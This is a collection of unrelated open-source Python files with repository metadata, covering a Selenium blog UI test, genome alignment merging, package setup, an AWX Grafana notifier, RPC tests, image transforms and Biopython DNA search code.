login_xp = '//*[@id="app"]/nav/div/ul/li[@class="nav-item"]/a[@href="#/login"]'
log_input_fields_xp = '//input'
sign_in_btn_xp = '//button[contains(text(),"Sign in")]'
locator(login_xp).click()
# Collect previous login_data
login_data = []
with open("login_data.txt", "r") as log_file:
content = log_file.readlines()
for i in content:
login_data.append(i.replace("\n", ""))
# login
log_input_fields = locators(log_input_fields_xp)
fill_input_fields_and_send(login_data, log_input_fields, locator(sign_in_btn_xp))
time.sleep(3)
# modified blog
my_articles_title_xp = '//div[@class="article-preview"]//a//h1'
nav_bar_user_xp = '//*[@id="app"]/nav/div/ul/li[4]/a'
blog_data = []
with open("blog_data.txt", "r") as blog_file: # Collect previous blog_data
content = blog_file.readlines()
for _ in content:
blog_data.append(_.replace("\n", ""))
user_name = locator(nav_bar_user_xp)
user_id_nav_xp = f'//nav//li/a[contains(text(), "{user_name.text}")]'
locator(user_id_nav_xp).click()
time.sleep(5)
# find_my_blog_title
my_blog_title = locator(f'{my_articles_title_xp}[contains(text(), "{blog_data[0]}")]')
my_blog_title.click()
# edit blog
article_page_h1_xp = '//div[@class="container"]/h1'
edit_btn_xp = '//div//span//a//span[contains(text(), "Edit Article")]'
mod_test_data = ["test modify", " Sun", "Sunny. Yesterday my life was fill the rain.", "sun"]
locator(edit_btn_xp).click()
form_input_fields = locators(form_input_fields_xp)
form_input_fields.insert(2, locator(textarea_xp)) # make full form fields
for _ in range(len(mod_test_data)):
form_input_fields[_].clear()
if form_input_fields[_].get_attribute("placeholder") == "Enter tags":
locator('//div//i[@class="ti-icon-close"]').click()
form_input_fields[_].send_keys(mod_test_data[_])
locator(publish_btn_xp).click()
# check blog
assert locator(article_page_h1_xp).text == mod_test_data[0]
# A012_CON_TC14_Meglévő blogbejegyzésem törlése
time.sleep(3)
delete_btn_xp = '//div/span/button[@class="btn btn-outline-danger btn-sm"]'
your_feed_xp = '//div[@class="feed-toggle"]/ul/li[1]/a[contains(text(), "Your Feed")]'
your_feed_list_xp = '//div[@class="home-my-feed"]//a[@class="preview-link"]/h1'
locator(delete_btn_xp).click()
# check delete blog in global feeds
time.sleep(3)
locator(home_link_xp).click()
locators(global_feed_list_xp)
# create_text_list(from global_feed_list to global_posts)
global_posts = []
all_pages_link = locators(all_pages_link_xp)
for page in all_pages_link:
global_feed_list = locators(global_feed_list_xp)
create_text_list(global_feed_list, global_posts)
page.click()
time.sleep(5)
assert not mod_test_data[0] in global_posts
# check delete blog in your feeds
locator(your_feed_xp).click()
your_posts = []
all_pages_link = locators(all_pages_link_xp)
for _ in all_pages_link:
your_feed_list = locators(your_feed_list_xp)
create_text_list(your_feed_list, your_posts)
_.click()
time.sleep(5)
assert not mod_test_data[0] in your_posts
locator(logout_xp).click()
| 35.797468 | 120 | 0.6814 |
355497f855a5610e465ee945f6f0c2e91bfa5610 | 6,198 | py | Python | maf_merge_from_consensus.py | brendane/miscellaneous_bioinfo_scripts | 91ca3282823495299e4c68aa79bdc1c0225a6d7b | [
"MIT"
] | null | null | null | maf_merge_from_consensus.py | brendane/miscellaneous_bioinfo_scripts | 91ca3282823495299e4c68aa79bdc1c0225a6d7b | [
"MIT"
] | 1 | 2020-09-17T11:14:13.000Z | 2020-09-17T11:14:13.000Z | maf_merge_from_consensus.py | brendane/miscellaneous_bioinfo_scripts | 91ca3282823495299e4c68aa79bdc1c0225a6d7b | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
"""
Merge multi-stage whole genome alignments
maf_merge_from_consensus.py --output <output file> <input maf>
<input_name:input_file...>
"""
import argparse
import collections
from Bio import Seq
MafSeq = collections.namedtuple('MafSeq', 'seq_name start aligned_bases strand contig_length seq')
def parse_maf(ih, print_line=False, handle=None):
record = {'a':{}, 's':{}}
for line in ih:
if print_line:
handle.write(line)
if line.startswith('a'):
if len(record['s']) > 0:
yield record
record = {'a':{}, 's':{}}
record['a'] = {x.split('=')[0]:x.split('=')[1] for x in line.strip().split()[1:]}
record['s'] = []
elif line.startswith('s'):
fields = line.strip().split()[1:]
record['s'].append(MafSeq(fields[0], int(fields[1]), int(fields[2]), fields[3], int(fields[4]), fields[5]))
else:
continue
yield record
parser = argparse.ArgumentParser(usage=__doc__)
parser.add_argument('--output')
parser.add_argument('maf')
parser.add_argument('inputs', nargs='+')
args = parser.parse_args()
## Goal:
## MAF file with coordinates of individual genomes
## 1. Map between consensus coordinates and individual genome coordinates
## args.inputs = batch_0:results/.../round1-batch.0/processed.maf
## Do this for each seq_name separately to parallelize
full_coords = {}
contig_lengths = {}
individual_contigs = collections.defaultdict(list)
for seq_name, maf_file in map(lambda x: x.split(':'), args.inputs):
coords = {} # consensus position: genome_position, direction, base
with open(maf_file, 'rt') as handle:
for rec in parse_maf(handle):
label = rec['a']['label']
length = len(rec['s'][0].seq)
print(seq_name, label)
for i in range(length):
# i = consensus position
coords[(seq_name + '.' + label, i)] = {}
for srec in rec['s']:
direction = 1
j = srec.start
if srec.strand == '-':
direction = -1
j = srec.contig_length - srec.start - 1
for i in range(length):
if i == 0:
contig_lengths[srec.seq_name] = srec.contig_length
individual_contigs[seq_name + '.' + label].append(srec.seq_name)
if srec.seq[i] == '-':
coords[(seq_name + '.' + label, i)][srec.seq_name] = (None, direction, srec.seq[i])
else:
coords[(seq_name + '.' + label, i)][srec.seq_name] = (j, direction, srec.seq[i])
j += direction
full_coords[seq_name] = coords
## 2. Walk through alignment of consensuses, substituting in the
## coordinates and bases from the individual genomes
## Do this for ind_seq_name separately to parallelize
with open(args.output, 'wt') as oh:
with open(args.maf, 'rt') as handle:
## For each LCB in the alignment of consensus genome
for rec in parse_maf(handle):
label = rec['a']['label']
length = len(rec['s'][0].seq)
oh.write('a label=' + label + '\n')
## For each consensus sequence that contributes to this LCB
for srec in rec['s']:
lcb = srec.seq_name
consensus = srec.seq_name.split('.')[0]
coords = full_coords[consensus]
## For each individual sequence that is part of the consensus sequence
for ind_seq_name in individual_contigs[lcb]:
direction = 1
j = srec.start
if srec.strand == '-':
direction = -1
j = srec.contig_length - srec.start - 1
ind_start = None
ind_end = None
ind_strand = None # Multiplied by direction of LCB in consensus alignment
ind_contig_length = contig_lengths[ind_seq_name]
aln_length = 0
sequence = ''
## Loop through each base to figure out start, end,
## strand, and aligned sequence
for i in range(length):
if srec.seq[i] == '-':
sequence += '-'
else:
## Matching coordinates:
matching = coords[(lcb, j)][ind_seq_name]
pos = matching[0]
ind_strand = matching[1]
bp = matching[2]
if direction == -1: bp = Seq.reverse_complement(bp)
sequence += bp
if bp != '-': aln_length += 1
j += direction
if pos is not None and (ind_start is None or ind_start > pos):
ind_start = pos
if pos is not None and (ind_end is None or ind_end < pos):
ind_end = pos
## Print out the record
actual_direction = ind_strand * direction
if len(set(sequence) - set('-')) == 0:
## Covers entirely a gap region in the non-consensus alignment
continue
if actual_direction == 1:
oh.write('s\t' + ind_seq_name + '\t' + str(ind_start) + '\t' +
str(aln_length) + '\t+\t' + str(ind_contig_length) +
'\t' + sequence + '\n')
else:
oh.write('s\t' + ind_seq_name + '\t' + str(ind_contig_length - ind_end) + '\t' +
str(aln_length) + '\t-\t' + str(ind_contig_length) +
'\t' + sequence + '\n')
oh.write('\n')
## 3. Merge all the individual components together if parallelized
| 42.452055 | 119 | 0.495482 |
b90b1f49a610781c4aad85f09b0d68671b8b54c5 | 3,825 | py | Python | setup.py | vischia/madminer | 98c2bcfb93d0fd84ff1872b344c4d89adf51217f | [
"MIT"
] | null | null | null | setup.py | vischia/madminer | 98c2bcfb93d0fd84ff1872b344c4d89adf51217f | [
"MIT"
] | null | null | null | setup.py | vischia/madminer | 98c2bcfb93d0fd84ff1872b344c4d89adf51217f | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Based on https://github.com/kennethreitz/setup.py
# Note: To use the 'upload' functionality of this file, you must:
# $ pip install twine
import io
import os
import sys
from shutil import rmtree
from setuptools import find_packages, setup, Command
# Package meta-data.
NAME = 'madminer'
DESCRIPTION = 'Mining gold from MadGraph to improve limit setting in particle physics.'
URL = 'https://github.com/johannbrehmer/madminer'
EMAIL = 'johann.brehmer@nyu.edu'
AUTHOR = 'Johann Brehmer, Felix Kling, Kyle Cranmer'
REQUIRES_PYTHON = '>=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, <4'
VERSION = '0.1.1'
# What packages are required for this module to be executed?
REQUIRED = [
"six",
"numpy>=1.11.0",
"scipy>=1.0.0",
"h5py",
"scikit-hep",
"scikit-learn>=0.19.0",
"torch>=0.4.0",
"bqplot",
"uproot",
"matplotlib",
]
# What packages are optional?
EXTRAS = {
# 'fancy feature': ['django'],
}
# The rest you shouldn't have to touch too much :)
# ------------------------------------------------
# Except, perhaps the License and Trove Classifiers!
# If you do change the License, remember to change the Trove Classifier for that!
here = os.path.abspath(os.path.dirname(__file__))
# Import the README and use it as the long-description.
# Note: this will only work if 'README.md' is present in your MANIFEST.in file!
try:
with io.open(os.path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = '\n' + f.read()
except FileNotFoundError:
long_description = DESCRIPTION
# Load the package's __version__.py module as a dictionary.
about = {}
if not VERSION:
with open(os.path.join(here, NAME, '__version__.py')) as f:
exec(f.read(), about)
else:
about['__version__'] = VERSION
class UploadCommand(Command):
"""Support setup.py upload."""
description = 'Build and publish the package.'
user_options = []
@staticmethod
def status(s):
"""Prints things in bold."""
print('\033[1m{0}\033[0m'.format(s))
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
try:
self.status('Removing previous builds…')
rmtree(os.path.join(here, 'dist'))
except OSError:
pass
self.status('Building Source and Wheel (universal) distribution…')
os.system('{0} setup.py sdist bdist_wheel --universal'.format(sys.executable))
self.status('Uploading the package to PyPI via Twine…')
os.system('twine upload dist/*')
self.status('Pushing git tags…')
os.system('git tag v{0}'.format(about['__version__']))
os.system('git push --tags')
sys.exit()
# Where the magic happens:
setup(
name=NAME,
version=about['__version__'],
description=DESCRIPTION,
long_description=long_description,
long_description_content_type='text/markdown',
author=AUTHOR,
author_email=EMAIL,
python_requires=REQUIRES_PYTHON,
url=URL,
packages=find_packages(exclude=('tests',)),
# If your package is a single module, use this instead of 'packages':
# py_modules=['mypackage'],
# entry_points={
# 'console_scripts': ['mycli=mymodule:cli'],
# },
install_requires=REQUIRED,
extras_require=EXTRAS,
include_package_data=True,
license='MIT',
classifiers=[
# Trove classifiers
# Full list: https://pypi.python.org/pypi?%3Aaction=list_classifiers
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
],
# $ setup.py publish support.
cmdclass={
'upload': UploadCommand,
},
) | 27.517986 | 87 | 0.635033 |
0d7dff9e05a11b257e2d2d4b98a9b4030e9c24c4 | 5,246 | py | Python | awx/main/notifications/grafana_backend.py | ziegenberg/awx | a3e29317c5d4220fffe28370ec73c73802255246 | [
"Apache-2.0"
] | null | null | null | awx/main/notifications/grafana_backend.py | ziegenberg/awx | a3e29317c5d4220fffe28370ec73c73802255246 | [
"Apache-2.0"
] | 2 | 2022-02-10T11:57:21.000Z | 2022-02-27T22:43:44.000Z | awx/main/notifications/grafana_backend.py | ziegenberg/awx | a3e29317c5d4220fffe28370ec73c73802255246 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2016 Ansible, Inc.
# All Rights Reserved.
import datetime
import json
import logging
import requests
import dateutil.parser as dp
from django.utils.encoding import smart_str
from django.utils.translation import gettext_lazy as _
from awx.main.notifications.base import AWXBaseEmailBackend
from awx.main.notifications.custom_notification_base import CustomNotificationBase
DEFAULT_MSG = CustomNotificationBase.DEFAULT_MSG
DEFAULT_APPROVAL_RUNNING_MSG = CustomNotificationBase.DEFAULT_APPROVAL_RUNNING_MSG
DEFAULT_APPROVAL_RUNNING_BODY = CustomNotificationBase.DEFAULT_APPROVAL_RUNNING_BODY
DEFAULT_APPROVAL_APPROVED_MSG = CustomNotificationBase.DEFAULT_APPROVAL_APPROVED_MSG
DEFAULT_APPROVAL_APPROVED_BODY = CustomNotificationBase.DEFAULT_APPROVAL_APPROVED_BODY
DEFAULT_APPROVAL_TIMEOUT_MSG = CustomNotificationBase.DEFAULT_APPROVAL_TIMEOUT_MSG
DEFAULT_APPROVAL_TIMEOUT_BODY = CustomNotificationBase.DEFAULT_APPROVAL_TIMEOUT_BODY
DEFAULT_APPROVAL_DENIED_MSG = CustomNotificationBase.DEFAULT_APPROVAL_DENIED_MSG
DEFAULT_APPROVAL_DENIED_BODY = CustomNotificationBase.DEFAULT_APPROVAL_DENIED_BODY
logger = logging.getLogger('awx.main.notifications.grafana_backend')
class GrafanaBackend(AWXBaseEmailBackend, CustomNotificationBase):
init_parameters = {"grafana_url": {"label": "Grafana URL", "type": "string"}, "grafana_key": {"label": "Grafana API Key", "type": "password"}}
recipient_parameter = "grafana_url"
sender_parameter = None
DEFAULT_BODY = "{{ job_metadata }}"
default_messages = {
"started": {"body": DEFAULT_BODY, "message": DEFAULT_MSG},
"success": {"body": DEFAULT_BODY, "message": DEFAULT_MSG},
"error": {"body": DEFAULT_BODY, "message": DEFAULT_MSG},
"workflow_approval": {
"running": {"message": DEFAULT_APPROVAL_RUNNING_MSG, "body": DEFAULT_APPROVAL_RUNNING_BODY},
"approved": {"message": DEFAULT_APPROVAL_APPROVED_MSG, "body": DEFAULT_APPROVAL_APPROVED_BODY},
"timed_out": {"message": DEFAULT_APPROVAL_TIMEOUT_MSG, "body": DEFAULT_APPROVAL_TIMEOUT_BODY},
"denied": {"message": DEFAULT_APPROVAL_DENIED_MSG, "body": DEFAULT_APPROVAL_DENIED_BODY},
},
}
def __init__(
self, grafana_key, dashboardId=None, panelId=None, annotation_tags=None, grafana_no_verify_ssl=False, isRegion=True, fail_silently=False, **kwargs
):
super(GrafanaBackend, self).__init__(fail_silently=fail_silently)
self.grafana_key = grafana_key
self.dashboardId = int(dashboardId) if dashboardId is not None else None
self.panelId = int(panelId) if panelId is not None else None
self.annotation_tags = annotation_tags if annotation_tags is not None else []
self.grafana_no_verify_ssl = grafana_no_verify_ssl
self.isRegion = isRegion
def format_body(self, body):
# expect body to be a string representing a dict
try:
potential_body = json.loads(body)
if isinstance(potential_body, dict):
body = potential_body
except json.JSONDecodeError:
body = {}
return body
def send_messages(self, messages):
sent_messages = 0
for m in messages:
grafana_data = {}
grafana_headers = {}
if 'started' in m.body:
try:
epoch = datetime.datetime.utcfromtimestamp(0)
grafana_data['time'] = grafana_data['timeEnd'] = int((dp.parse(m.body['started']).replace(tzinfo=None) - epoch).total_seconds() * 1000)
if m.body.get('finished'):
grafana_data['timeEnd'] = int((dp.parse(m.body['finished']).replace(tzinfo=None) - epoch).total_seconds() * 1000)
except ValueError:
logger.error(smart_str(_("Error converting time {} or timeEnd {} to int.").format(m.body['started'], m.body['finished'])))
if not self.fail_silently:
raise Exception(smart_str(_("Error converting time {} and/or timeEnd {} to int.").format(m.body['started'], m.body['finished'])))
grafana_data['isRegion'] = self.isRegion
if self.dashboardId is not None:
grafana_data['dashboardId'] = self.dashboardId
if self.panelId is not None:
grafana_data['panelId'] = self.panelId
if self.annotation_tags:
grafana_data['tags'] = self.annotation_tags
grafana_data['text'] = m.subject
grafana_headers['Authorization'] = "Bearer {}".format(self.grafana_key)
grafana_headers['Content-Type'] = "application/json"
r = requests.post(
"{}/api/annotations".format(m.recipients()[0]), json=grafana_data, headers=grafana_headers, verify=(not self.grafana_no_verify_ssl)
)
if r.status_code >= 400:
logger.error(smart_str(_("Error sending notification grafana: {}").format(r.status_code)))
if not self.fail_silently:
raise Exception(smart_str(_("Error sending notification grafana: {}").format(r.status_code)))
sent_messages += 1
return sent_messages
| 49.028037 | 155 | 0.682234 |
894dd87fd23352ae4249a35a3c4032479c290306 | 1,292 | py | Python | test/functional/rpcnamedargs.py | Exgibichi/statusquo | 0a31913747fa09637cdaeadf009df75381e6efc4 | [
"MIT"
] | null | null | null | test/functional/rpcnamedargs.py | Exgibichi/statusquo | 0a31913747fa09637cdaeadf009df75381e6efc4 | [
"MIT"
] | null | null | null | test/functional/rpcnamedargs.py | Exgibichi/statusquo | 0a31913747fa09637cdaeadf009df75381e6efc4 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test using named arguments for RPCs."""
from test_framework.test_framework import StatusquoTestFramework
from test_framework.util import (
assert_equal,
assert_raises_jsonrpc,
)
class NamedArgumentTest(StatusquoTestFramework):
"""
Test named arguments on RPC calls.
"""
def __init__(self):
super().__init__()
self.setup_clean_chain = False
self.num_nodes = 1
def run_test(self):
node = self.nodes[0]
h = node.help(command='getinfo')
assert(h.startswith('getinfo\n'))
assert_raises_jsonrpc(-8, 'Unknown named parameter', node.help, random='getinfo')
h = node.getblockhash(height=0)
node.getblock(blockhash=h)
assert_equal(node.echo(), [])
assert_equal(node.echo(arg0=0,arg9=9), [0] + [None]*8 + [9])
assert_equal(node.echo(arg1=1), [None, 1])
assert_equal(node.echo(arg9=None), [None]*10)
assert_equal(node.echo(arg0=0,arg3=3,arg9=9), [0] + [None]*2 + [3] + [None]*5 + [9])
if __name__ == '__main__':
NamedArgumentTest().main()
| 30.761905 | 92 | 0.657121 |
2c393e83c6867ab3f6e38512c9d56c3a33b1f643 | 949 | py | Python | test/test_topology_lib_subinterface.py | payalupadhyaya/topology_lib_subinterface | 80ddd3d24ca0ff10c12ec6cd68dc3a8c5ec6c2ec | [
"Apache-2.0"
] | null | null | null | test/test_topology_lib_subinterface.py | payalupadhyaya/topology_lib_subinterface | 80ddd3d24ca0ff10c12ec6cd68dc3a8c5ec6c2ec | [
"Apache-2.0"
] | null | null | null | test/test_topology_lib_subinterface.py | payalupadhyaya/topology_lib_subinterface | 80ddd3d24ca0ff10c12ec6cd68dc3a8c5ec6c2ec | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Copyright (C) 2016 Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
Test suite for module topology_lib_subinterface.
"""
from __future__ import unicode_literals, absolute_import
from __future__ import print_function, division
# Add your test cases here.
def test_your_test_case():
"""
Document your test case here.
"""
print("test this test case)
pass
| 27.911765 | 66 | 0.741834 |
cbf1e8dee92d101a9bcf56d360c0b18ae3a79a52 | 1,775 | py | Python | dataset/utils.py | wolfib/proxy-nca | 7166025081b98dfafa02ba5dc1288ce981b9367e | [
"MIT"
] | null | null | null | dataset/utils.py | wolfib/proxy-nca | 7166025081b98dfafa02ba5dc1288ce981b9367e | [
"MIT"
] | null | null | null | dataset/utils.py | wolfib/proxy-nca | 7166025081b98dfafa02ba5dc1288ce981b9367e | [
"MIT"
] | null | null | null | from torchvision import transforms
import PIL.Image
import torch
def std_per_channel(images):
images = torch.stack(images, dim = 0)
return images.view(3, -1).std(dim = 1)
def mean_per_channel(images):
images = torch.stack(images, dim = 0)
return images.view(3, -1).mean(dim = 1)
class Identity(): # used for skipping transforms
def __call__(self, im):
return im
class ScaleIntensities():
def __init__(self, in_range, out_range):
""" Scales intensities. For example [-1, 1] -> [0, 255]."""
self.in_range = in_range
self.out_range = out_range
def __call__(self, tensor):
tensor = (
tensor - self.in_range[0]
) / (
self.in_range[1] - self.in_range[0]
) * (
self.out_range[1] - self.out_range[0]
) + self.out_range[0]
return tensor
def make_transform(sz_resize = 256, sz_crop = 227, mean = [128, 117, 104],
std = [1, 1, 1], rgb_to_bgr = True, is_train = True,
intensity_scale = [[0, 1], [0, 255]]):
return transforms.Compose([
transforms.Compose([ # train: horizontal flip and random resized crop
transforms.RandomResizedCrop(sz_crop),
transforms.RandomHorizontalFlip(),
]) if is_train else transforms.Compose([ # test: else center crop
transforms.Resize(sz_resize),
transforms.CenterCrop(sz_crop),
]),
transforms.ToTensor(),
ScaleIntensities(
*intensity_scale) if intensity_scale is not None else Identity(),
transforms.Normalize(
mean=mean,
std=std,
),
transforms.Lambda(
lambda x: x[[2, 1, 0], ...]
) if rgb_to_bgr else Identity()
])
| 29.098361 | 77 | 0.588732 |
e9f6b6c744f2841c65955a490697e99665544cb6 | 33 | py | Python | venus/db/dbo/adapter/__init__.py | nagylzs/python-venus-lib | 336d20532c32e874ab0a43cf866092b9e55dded5 | [
"Apache-2.0"
] | null | null | null | venus/db/dbo/adapter/__init__.py | nagylzs/python-venus-lib | 336d20532c32e874ab0a43cf866092b9e55dded5 | [
"Apache-2.0"
] | 1 | 2019-02-15T13:40:49.000Z | 2019-02-15T13:40:49.000Z | venus/db/dbo/adapter/__init__.py | nagylzs/python-venus-lib | 336d20532c32e874ab0a43cf866092b9e55dded5 | [
"Apache-2.0"
] | null | null | null | """Database adapters package."""
| 16.5 | 32 | 0.69697 |
38b6fc9243373b4563b87ae2eb886f68c67f81b3 | 274 | py | Python | problems/remove_element/solution.py | nagahshi/LeetCodeProblems_Repository | ed9831141fdd6ca432acb25318ef5afdb3a7fd3a | [
"MIT"
] | null | null | null | problems/remove_element/solution.py | nagahshi/LeetCodeProblems_Repository | ed9831141fdd6ca432acb25318ef5afdb3a7fd3a | [
"MIT"
] | null | null | null | problems/remove_element/solution.py | nagahshi/LeetCodeProblems_Repository | ed9831141fdd6ca432acb25318ef5afdb3a7fd3a | [
"MIT"
] | null | null | null | class Solution(object):
def removeElement(self, nums: List[int], val: int) -> int:
"""
:type nums: list
:type val: int
:rtype: int (size of num)
"""
while val in nums:
nums.remove(val)
return len(nums) | 27.4 | 62 | 0.50365 |
38380a24448b26b5a31f3dcdef75bf92e9def696 | 1,844 | py | Python | cgi-bin/passmots/salvaOrigemRegistro.py | wsampaio/multi_agenda_py | 72c9cf4d8b26827a9eba6de3119e63464d312aea | [
"CC-BY-4.0"
] | null | null | null | cgi-bin/passmots/salvaOrigemRegistro.py | wsampaio/multi_agenda_py | 72c9cf4d8b26827a9eba6de3119e63464d312aea | [
"CC-BY-4.0"
] | null | null | null | cgi-bin/passmots/salvaOrigemRegistro.py | wsampaio/multi_agenda_py | 72c9cf4d8b26827a9eba6de3119e63464d312aea | [
"CC-BY-4.0"
] | null | null | null | #!/usr/bin/env python3
#
# Este arquivo é parte do programa multi_agenda
#
# Esta obra está licenciada com uma
# Licença Creative Commons Atribuição 4.0 Internacional.
# (CC BY 4.0 Internacional)
#
# Para ver uma cópia da licença, visite
# https://creativecommons.org/licenses/by/4.0/legalcode
#
# WELLINGTON SAMPAIO - wsampaio@yahoo.com
# https://www.linkedin.com/in/wellsampaio/
#
import sys
import cgi
from os.path import dirname, realpath, sep, pardir
sys.path.append((dirname(realpath(__file__)) + sep + pardir))
import cgitb
cgitb.enable()
from objetos.passmots.OrigemRegistro import OrigemRegistro
from objetos.passmots.OrigemRegistroDAO import OrigemRegistroDAO
codOrigemRegistro = 0
form = cgi.FieldStorage()
origemRegistro = OrigemRegistro()
origemRegistroDAO = OrigemRegistroDAO()
if str(form) != "FieldStorage(None, None, '')":
codOrigemRegistro = int(form.getvalue("codOrigemRegistro"))
if form.getvalue("codOrigemRegistro"):
origemRegistro.setCodOrigemRegistro(int(form.getvalue("codOrigemRegistro")))
if form.getvalue("origemRegistro"):
origemRegistro.setOrigemRegistro(str(form.getvalue("origemRegistro")))
if codOrigemRegistro > 0:
if form.getvalue("delete"):
origemRegistroDAO.delete(origemRegistro.getCodOrigemRegistro())
else:
origemRegistroDAO.update(origemRegistro)
else:
origemRegistroDAO.insert(origemRegistro)
else:
#tentando enviar status de erro
#header("HTTP/1.0 404 Not Found");
#print "Status: 404 Not Found\r\n"
#print "Content-Type: text/html\r\n\r\n"
#print "Status: 400 Bad Request\r\n"
pass
#print("Content-type: text/html\n")
#print("Content-type: application/json\n")
#print("form = " + str(form))
#print("codHistorico = " + str(codHistorico))
if form.getvalue("delete"):
print("DELETE")
else:
print("não delete")
print("""
Dados Salvos
""")
| 20.719101 | 78 | 0.743492 |
22c5e29803815291c40cae37e56aea0fb333e1fc | 355 | py | Python | project/editorial/migrations/0015_remove_videoasset_embed.py | cojennin/facet | 230e65316134b3399a35d40034728e61ba63cb2a | [
"MIT"
] | 25 | 2015-07-13T22:16:36.000Z | 2021-11-11T02:45:32.000Z | project/editorial/migrations/0015_remove_videoasset_embed.py | cojennin/facet | 230e65316134b3399a35d40034728e61ba63cb2a | [
"MIT"
] | 74 | 2015-12-01T18:57:47.000Z | 2022-03-11T23:25:47.000Z | project/editorial/migrations/0015_remove_videoasset_embed.py | cojennin/facet | 230e65316134b3399a35d40034728e61ba63cb2a | [
"MIT"
] | 6 | 2016-01-08T21:12:43.000Z | 2019-05-20T16:07:56.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('editorial', '0014_videoasset_embed'),
]
operations = [
migrations.RemoveField(
model_name='videoasset',
name='embed',
),
]
| 18.684211 | 47 | 0.605634 |
15c140aa69963c538a5e1891ea45929940c8e9ad | 6,268 | py | Python | Scripts/xbbtools/xbb_search.py | mikepm35/biopython | 9f2d4d8d70ec7223df35fdc3d9c4a3c018756327 | [
"BSD-3-Clause"
] | 1 | 2020-02-13T14:32:44.000Z | 2020-02-13T14:32:44.000Z | Scripts/xbbtools/xbb_search.py | EsamTolba/biopython | 120616cf0d28cb8e581898afd6604e5a2065a137 | [
"BSD-3-Clause"
] | null | null | null | Scripts/xbbtools/xbb_search.py | EsamTolba/biopython | 120616cf0d28cb8e581898afd6604e5a2065a137 | [
"BSD-3-Clause"
] | 1 | 2019-03-14T18:59:30.000Z | 2019-03-14T18:59:30.000Z | #!/usr/bin/env python
# Copyright 2000 by Thomas Sicheritz-Ponten.
# Copyrigth 2016 by Markus Piotrowski.
# All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
# Created: Sun Dec 3 13:38:52 2000
# thomas@cbs.dtu.dk, http://www.cbs.dtu.dk/thomas
"""Search code for graphical Xbbtools tool."""
import re
try: # Python 2
import Tkinter as tk
import ttk
import tkColorChooser as colorchooser
except ImportError: # Python 3
import tkinter as tk
import tkinter.ttk as ttk
from tkinter import colorchooser
from Bio.Data.IUPACData import ambiguous_dna_values
from Bio.Seq import reverse_complement
import xbb_widget
class DNAsearch(object):
"""Class to search a DNA sequence."""
def __init__(self):
"""Set up the alphabet."""
self.init_alphabet()
self.sequence = ''
def init_alphabet(self):
"""Expand alphabet values for ambiguous codes."""
self.alphabet = ambiguous_dna_values
other = ''.join(self.alphabet)
self.alphabet['N'] = self.alphabet['N'] + other
for key in self.alphabet:
if key == 'N':
continue
if key in self.alphabet[key]:
continue
self.alphabet[key] = self.alphabet[key] + key
def SetSeq(self, seq):
"""Set sequence."""
self.sequence = seq
def SetPattern(self, pattern):
"""Convert search pattern to regular expression."""
self.pattern = pattern
self.rx_pattern = self.IUPAC2regex(pattern)
self.rx = re.compile(self.rx_pattern)
def IUPAC2regex(self, s):
"""Translate search text into pattern."""
rx = ''
for i in s:
r = self.alphabet.get(i, i)
if len(r) > 1:
rx = '%s[%s]' % (rx, r)
else:
rx += r
return rx
def _Search(self, start=0):
"""Search and return MatchObject (PRIVAT)."""
# Only called from SearchAll. Is it used?
pos = self.rx.search(self.sequence, start)
return pos
def Search(self, start=0):
"""Search for query sequence and return position."""
pos = self.rx.search(self.sequence, start)
if pos:
return pos.start()
else:
return -1
def SearchAll(self):
"""Search the whole sequence."""
# Doesn't seem to be used...
pos = -1
positions = []
while True:
m = self._Search(pos + 1)
if not m:
break
pos = m.start()
if pos == -1:
break
positions.append(pos)
return positions
class XDNAsearch(tk.Toplevel, DNAsearch):
"""Graphical tools to perform the DNA search."""
def __init__(self, seq='', master=None, highlight=0):
"""Initialize the search GUI."""
DNAsearch.__init__(self)
self.master = master
self.highlight = highlight
self.colors = []
self.init_graphics()
self.sequence = seq
self.cur_pos = 0
def init_graphics(self):
"""Build the search window."""
tk.Toplevel.__init__(self, self.master)
self.frame = ttk.Frame(self)
self.frame.pack(fill=tk.BOTH, expand=1)
self.search_entry = ttk.Entry(self.frame)
self.search_entry.pack(fill=tk.BOTH, expand=1)
f2 = ttk.Frame(self.frame)
f2.pack(side=tk.TOP, fill=tk.BOTH, expand=1)
f = f2
self.forward = ttk.Button(f, text='Search +', command=self.do_search)
self.forward.pack(side=tk.LEFT)
self.forward = ttk.Button(
f, text='Search -',
command=lambda x=self.do_search: x(other_strand=1))
self.forward.pack(side=tk.LEFT)
self.cancel = ttk.Button(f, text='Cancel', command=self.exit)
self.cancel.pack(side=tk.LEFT)
self.current_color = 'cyan'
self.colorb = ttk.Button(f, text='Color', command=self.change_color)
self.colorb.pack(side=tk.LEFT)
self.config_color(self.current_color)
def config_color(self, color=None):
"""Set color for found sequence tag."""
if not self.highlight:
return
if not color:
color = colorchooser.askcolor()[1]
if not color:
color = 'cyan'
self.current_color = color
self.current_tag = 'searched_%s' % self.current_color
self.master.tag_config(self.current_tag, background=self.current_color)
self.master.tag_config(self.current_tag + 'R',
background=self.current_color, underline=1)
self.colors.append(color)
def change_color(self):
"""Call back for color button."""
self.config_color()
def get_pattern(self):
"""Retrieve query sequence."""
pattern = self.search_entry.get()
return pattern
def do_search(self, other_strand=0):
"""Start the search."""
pattern = self.get_pattern()
if other_strand:
pattern = reverse_complement(pattern)
self.SetPattern(pattern)
